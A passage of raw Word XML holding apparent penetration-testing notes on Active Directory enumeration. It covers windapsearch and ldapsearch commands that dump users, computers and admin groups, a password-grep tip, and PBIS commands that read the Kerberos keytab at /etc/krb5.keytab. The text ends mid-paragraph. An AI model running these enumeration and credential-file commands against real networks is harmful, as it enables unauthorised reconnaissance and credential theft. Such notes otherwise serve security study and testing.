    <w:p w14:paraId="656203CC" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38A3C3" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t># Get Domain Admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF7D4E" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A6F0C7" w14:textId="77777777" w:rsidR="00D63F7B" w:rsidRPr="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t># Get Privileged Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC16458" w14:textId="606FDB28" w:rsidR="00D63F7B" w:rsidRDefault="00D63F7B" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63F7B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242EE7AE" w14:textId="77777777" w:rsidR="000609D7" w:rsidRDefault="000609D7" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CFF64B4" w14:textId="1BBB99E9" w:rsidR="000609D7" w:rsidRDefault="000609D7" w:rsidP="00D63F7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59582B" w14:textId="462F603F" w:rsidR="000609D7" w:rsidRDefault="00015FA6" w:rsidP="00015FA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Allows you to check for null credential</w:t>
      </w:r>
      <w:r w:rsidR="009C0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> validity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4EE23" w14:textId="77777777" w:rsidR="009C0E57" w:rsidRPr="009C0E57" w:rsidRDefault="009C0E57" w:rsidP="009C0E57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '' -w '' -b "DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB84A80" w14:textId="6A50B54A" w:rsidR="00015FA6" w:rsidRDefault="009C0E57" w:rsidP="009C0E57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C0E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3263F7" w14:textId="717F9D51" w:rsidR="009C0E57" w:rsidRDefault="009C0E57" w:rsidP="009C0E57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If an error is received that says “bind must be completed”, that means the credentials are incorrect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5186F214" w14:textId="775F6767" w:rsidR="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="009C0E57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To extract everything from a domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF1E0F" w14:textId="77777777" w:rsidR="00E554AA" w:rsidRPr="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0391073C" w14:textId="77777777" w:rsidR="00E554AA" w:rsidRPr="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-x Simple Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF3DD8" w14:textId="77777777" w:rsidR="00E554AA" w:rsidRPr="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-H LDAP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42847863" w14:textId="77777777" w:rsidR="00E554AA" w:rsidRPr="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-D My User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0B3D9C" w14:textId="77777777" w:rsidR="00E554AA" w:rsidRPr="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-w My password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3064263C" w14:textId="1D478D19" w:rsidR="00E554AA" w:rsidRDefault="00E554AA" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E554AA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>-b Base site, all data from here will be given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF5171" w14:textId="77777777" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADA9052" w14:textId="0E65AD1C" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="00E554AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extracting users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B02113C" w14:textId="77777777" w:rsidR="000679BE" w:rsidRPr="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Users,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B8107" w14:textId="095BFBA6" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Example: ldapsearch -x -H ldap://&lt;IP&gt; -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCB87E" w14:textId="30454F9E" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting computers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5CCBF" w14:textId="05FE6D7B" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Computers,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F2C255" w14:textId="393BC9FA" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting “my info”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2AA284" w14:textId="243B075D" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=&lt;MY NAME&gt;,CN=Users,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78E3F9" w14:textId="0795019A" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting Domain Admins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33427B" w14:textId="474572E3" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Domain Admins,CN=Users,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3867AE26" w14:textId="1BEA105E" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting Domain Users:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17889293" w14:textId="00DFA511" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Domain Users,CN=Users,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD6DA5" w14:textId="54646F18" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting Enterprise Admins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E59B3BB" w14:textId="0A03A963" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Enterprise Admins,CN=Users,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E82D6A" w14:textId="32E35450" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting Administrators:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17019289" w14:textId="784940F2" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Administrators,CN=Builtin,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D244A6" w14:textId="75E89842" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Extracting Remote Desktop Group:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DDC773" w14:textId="3269F0D0" w:rsidR="000679BE" w:rsidRDefault="000679BE" w:rsidP="000679BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000679BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ldapsearch -x -H ldap://&lt;IP&gt; -D '&lt;DOMAIN&gt;\&lt;username&gt;' -w '&lt;password&gt;' -b "CN=Remote Desktop Users,CN=Builtin,DC=&lt;1_SUBDOMAIN&gt;,DC=&lt;TLD&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F96D6" w14:textId="0C112812" w:rsidR="000679BE" w:rsidRDefault="00937918" w:rsidP="00937918">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidR="00671981" w:rsidRPr="00937918">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>To check if you have access to any password, you can use grep to check if the passwor</w:t>
      </w:r>
      <w:r w:rsidRPr="00937918">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334935C" w14:textId="77777777" w:rsidR="00937918" w:rsidRDefault="00937918" w:rsidP="008475B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1702BAA6" w14:textId="22DC498F" w:rsidR="008475B0" w:rsidRDefault="008475B0" w:rsidP="008475B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PBIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031D68EA" w14:textId="6506CFAD" w:rsidR="008475B0" w:rsidRDefault="008475B0" w:rsidP="008475B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PBIS is another Github repo and allows you to gain basic information about an LDAP instance easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808DA6D" w14:textId="07E6372A" w:rsidR="0018189D" w:rsidRDefault="00420090" w:rsidP="008475B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="0018189D" w:rsidRPr="00DC2AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          </w:rPr>
          <w:t>https://github.com/BeyondTrust/pbis-open/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EB60401" w14:textId="7FABA447" w:rsidR="00821866" w:rsidRDefault="00821866" w:rsidP="00821866">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Usually under /opt/pbis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3254321A" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EB206C3" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>#Read keytab file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBA19B8" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./klist -k /etc/krb5.keytab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34796822" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="309CB459" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>#Get known domains info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF8590" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./get-status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73A6DF" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0018189D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>./lsa get-status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5B6BD" w14:textId="77777777" w:rsidR="0018189D" w:rsidRPr="0018189D" w:rsidRDefault="0018189D" w:rsidP="0018189D">
      <w:pPr>
        <w:rPr>
